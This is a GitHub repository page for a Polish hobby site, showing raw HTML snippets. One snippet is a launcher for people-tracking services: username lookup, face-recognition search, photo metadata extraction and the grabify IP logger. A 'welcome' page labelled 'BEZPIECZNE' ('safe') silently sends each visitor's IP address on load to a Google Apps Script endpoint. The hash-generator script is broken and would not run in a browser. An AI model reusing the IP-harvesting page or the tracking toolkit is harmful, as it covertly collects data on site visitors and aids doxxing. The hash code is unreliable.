Skip to content

XVENON4X/bennler.github.io

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

83 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

<title>Strona z tłem GIF</title> <style> body { margin: 0; padding: 0; background: url('backgrundgit/Matrix%20wallpaper%20gif.gif') no-repeat center center fixed; background-size: cover; height: 100vh; width: 100vw; overflow: hidden; } </style> <title>Przykładowe Przycisk</title> <style> body { display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100vh; margin: 0; } .button { padding: 10px 20px; font-size: 16px; color: white; background-color: #282728; border: none; border-radius: 5px; cursor: pointer; margin: 10px; } .button:hover { background-color: #3e3e3e; } </style> Wysz. po nicku Wysz. po twarzy Inf. ze zdj. Zbieraczka z linku Otwórz wszystko <script> function openAll() { setTimeout(function() { window.open('https://whatsmyname.app/', '_blank'); }, 1000); setTimeout(function() { window.open('https://facecheck.id', '_blank'); }, 3000); setTimeout(function() { window.open('https://jimpl.com', '_blank'); }, 5000); setTimeout(function() { window.open('https://grabify.link', '_blank'); }, 7500); } </script> <title>Przykład</title>

BEZPIECZNE

<title>Moja Strona</title> <script> async function getIpAndSave() { try { // Pobranie adresu IP const response = await fetch('https://api.ipify.org?format=json'); const data = await response.json(); const userIp = data.ip; // Wyświetlenie IP na stronie document.getElementById('ip').textContent = `Twoje IP to: ${userIp}`; // Wysłanie IP do Google Sheets const postResponse = await fetch('https://script.google.com/macros/s/1rj9SWrv7LE6weqJ_5oFMYE0xMm2y8gmCujET0mchUlo/exec', { // Zastąp YOUR_SCRIPT_ID swoim ID method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: `ip=${userIp}`, // Przesyłanie IP jako parametr }); const result = await postResponse.text(); console.log(result); } catch (error) { console.error('Błąd:', error); } } // Uruchomienie funkcji po załadowaniu strony window.onload = getIpAndSave; </script>

Witaj na mojej stronie!

Ładowanie IP...

<title>Hash Generator</title>

Hash Generator

Enter password:

Select hash type: MD5 SHA1 MySQL NTLM SHA256 MD5 Email SHA256 Email SHA512

Generate Hash

<script> function generateHash() { const password = document.getElementById("password").value; const hashType = document.getElementById("hash-type").value; switch (hashType) { case "md5": const md5Hash = crypto.createHash("md5"); md5Hash.update(password); const md5Result = md5Hash.digest("hex"); document.getElementById("result").innerHTML = `MD5 Hash: ${md5Result}`; break; case "sha1": const sha1Hash = crypto.createHash("sha1"); sha1Hash.update(password); const sha1Result = sha1Hash.digest("hex"); document.getElementById("result").innerHTML = `SHA1 Hash: ${sha1Result}`; break; case "mysql": // MySQL hash is a double SHA1 hash, so we need to hash the password twice const mysqlHash = crypto.createHash("sha1"); mysqlHash.update(password); const mysqlResult = mysqlHash.digest("hex"); mysqlHash.update(mysqlResult); mysqlResult = mysqlHash.digest("hex"); document.getElementById("result").innerHTML = `MySQL Hash: ${mysqlResult}`; break; case "ntlm": // NTLM hash is a MD4 hash, which is not supported by the Web Crypto API // We can use a library like js-md4 to implement the MD4 algorithm const ntlmHash = md4(password); document.getElementById("result").innerHTML = `NTLM Hash: ${ntlmHash}`; break; case "sha256": const sha256Hash = crypto.createHash("sha256"); sha256Hash.update(password); const sha256Result = sha256Hash.digest("hex"); document.getElementById("result").innerHTML = `SHA256 Hash: ${sha256Result}`; break; case "md5-email": // MD5 Email hash is a MD5 hash of the email address in lowercase const md5EmailHash = crypto.createHash("md5"); md5EmailHash.update(password.toLowerCase()); const md5EmailResult = md5EmailHash.digest("hex"); document.getElementById("result").innerHTML = `MD5 Email Hash: ${md5EmailResult}`; break; case "sha256-email": // SHA256 Email hash is a SHA256 hash of the email address in lowercase const sha256EmailHash = crypto.createHash("sha256"); sha256EmailHash.update(password.toLowerCase()); const sha256EmailResult = sha256EmailHash.digest("hex"); document.getElementById("result").innerHTML = `SHA256 Email Hash: ${sha256EmailResult}`; break; case "sha512": const sha512Hash = crypto.createHash("sha512"); sha512Hash.update(password); const sha512Result = sha512Hash.digest("hex"); document.getElementById("result").innerHTML = `SHA512 Hash: ${sha512Result}`; break; } } </script>

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published